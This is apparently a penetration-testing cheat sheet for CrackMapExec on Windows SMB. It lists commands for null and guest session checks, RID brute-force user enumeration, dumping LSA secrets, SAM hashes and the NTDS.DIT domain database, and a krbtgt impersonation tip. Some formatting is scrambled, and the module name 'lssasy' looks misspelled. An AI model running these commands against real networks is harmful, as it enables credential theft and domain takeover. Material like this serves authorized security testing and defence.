3.2 KiB
3.2 KiB
SMB Server Information and Enumeration Techniques
Basic Connection to SMB Server:
cme smb <IP>
- Establishes a connection to the SMB server at the specified IP.
- Verifies if the SMB service is active and responsive.
Testing Null or Anonymous Access:
cme smb <IP> -u '' -p ''
- Attempts a connection to the SMB server without session credentials.
- Useful for identifying if guest or anonymous access is permitted on the server.
Guest Account Access Check:
cme smb <IP> -u 'guest' -p ''
- Connects using the ‘guest’ account with no password.
- Can help identify if guest access is enabled and examine associated permissions.
User Enumeration via RID Brute Force:
cme smb <IP> -u 'USER' -p 'PASSWORD' --rid-brute
- Performs RID brute-forcing to enumerate all users on the SMB server.
- Useful for gathering a complete list of valid usernames, aiding further enumeration or exploitation.
- Tip: Use the
-kflag to switch to Kerberos if NTLM authentication is disabled on the target.
- Tip: Use the
Local Admin Data Extraction:
If local admin privileges are confirmed, use the following commands:
-
Dump LSA (Local Security Authority) Data:
cme smb <IP> --lsa- Dumps sensitive LSA data, such as stored credentials and session tokens.
-
Extract SAM Database (Security Account Manager):
cme smb <IP> --sam- Retrieves the SAM database, containing local user information and password hashes.
Note: Ensure local admin privileges before using --lsa or --sam, as these commands extract highly sensitive information.
Enhancing CME Logging with cme.conf
Customize logging within CME’s configuration file (cme.conf) for more detailed logging and custom success messages.
- Example Configuration:
pwn3d_label = Admin! # Customize success message to "Admin!" upon login log_mode = True # Enables verbose logging for auditing and troubleshooting
Enabling log_mode provides detailed output, which is useful for tracking activities or debugging issues.
Extracting NTDS.DIT for Domain-Wide Credential Access
cme smb <IP> --ntds
- Extracts the NTDS.DIT database, which holds domain user and machine credentials.
- Effective for gaining access to the entire domain credential set, a key target in domain compromise scenarios.
- Tip: Use
--user krbtgtto leverage the Krbtgt account for impersonating any user.
- Tip: Use
Prerequisite: Requires domain admin privileges or equivalent to access NTDS.DIT data.
Mimikatz Alternative
cme smb <IP> -M lssasy
Additional Best Practices and Tips
- NTLM vs. Kerberos Authentication: If NTLM is disabled, specify
-kto enable Kerberos, the preferred protocol on many modern domains. - Privilege Requirements Awareness: Commands like
--lsaand--samneed elevated privileges. Verify your access level before executing commands with high privilege requirements. - Secure Password Handling: Avoid hardcoding sensitive passwords directly in command-line inputs. Instead, reference stored credentials securely to prevent exposure in logs.